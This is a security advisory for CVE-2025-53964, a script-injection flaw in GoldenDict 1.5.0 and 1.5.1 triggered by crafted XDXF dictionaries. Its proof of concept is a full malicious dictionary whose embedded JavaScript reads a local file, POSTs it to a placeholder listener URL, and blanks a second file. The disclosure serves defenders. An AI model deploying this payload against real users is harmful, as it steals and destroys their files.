# CVE-2025-53964
## Risk assessment
CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10
## Description
GoldenDict 1.5.0 and 1.5.1 has an exposed dangerous method that allows reading and modifying files when a user adds
a crafted dictionary and then searches for any term included in that dictionary.
## Additional Information
The product provides interface for interaction with external actors, which includes a dangerous method in GoldenDict (ver. 1.5.0, 1.5.1) that is not properly restricted. This allows remote attacker get access to read and modify files on the user file system when a prepared malicious dictionary is added and used in the program.
## Vulnerability type
CWE-749: Exposed Dangerous Method or Function; CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
## Vendor of Product
GoldenDict Project
## Affected Product Code Base
GoldenDict - 1.5.0, 1.5.1
## Affected Component
GoldenDict executable, source code file xdxf.cc, source code file xdxf2html.cc, source code file stardict.cc.
## Attack Type
Remote
## Impact Code execution
true
## Impact Information Disclosure
true
## CVE Impact Other
Access to read and modify files on the user file system
## Attack Vectors
To exploit the vulnerability, a user must add a malicious dictionary to the program and search for any term included in that dictionary.
## Discoverer
Grebennikov Timofey, a specialist in the penetration testing group of the security control department of the development of the Astra Group.
## Reference
https://github.com/goldendict/goldendict/releases
## Details
GoldenDict is a graphical program for searching terms in Wikipedia and locally installed dictionaries. Various dictionary formats are supported, including the XDXF format with XML markup. Dictionaries are distributed on the Internet by other users.

The program uses a browser engine, which is included in the Qt Widgets components package, to render and display words from dictionaries.

Several security violations were discovered at once, which allow the implementation of a critical vulnerability:
1) Lack of sanitization of XML content;
2) Lack of prohibition on execution of JS code;
3) Disabled or weak CSP policy.

Together, these violations lead to the possibility of gaining access to user files by embedding malicious JS code in the XML markup of an XDXF dictionary downloaded from the Internet.
## Proof-of-Concept
To test for a vulnerability on Windows, you can run a script that affects two prepared files in the file system.
1) Create two files in the C:\Users\Public\Documents directory and fill them with any content:
  - secret.txt – some confidential information;
  - idea.txt – some important information you don't want to lose.
2) Create an XDXF-dictionary malicious_dictionary.xdxf with the following contents:
```
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>
```

When initialized, this dictionary will send the contents of secret.txt to the remote server and clear idea.txt. 

3) Replace the [Target-URL] template with the address of any HTTP request listener you control.
4) Add the generated dictionary to GoldenDict's list of local dictionaries.
5) Search for the term "vuln-test".

Verify the attack's success – the recipient will receive a message containing the contents of the secret.txt file, and the idea.txt file will be empty.

The vulnerability affects both Windows and Linux systems. To reproduce the vulnerability on a Linux system, it is necessary to use different directories for storing test files and specify this in the malicious code.
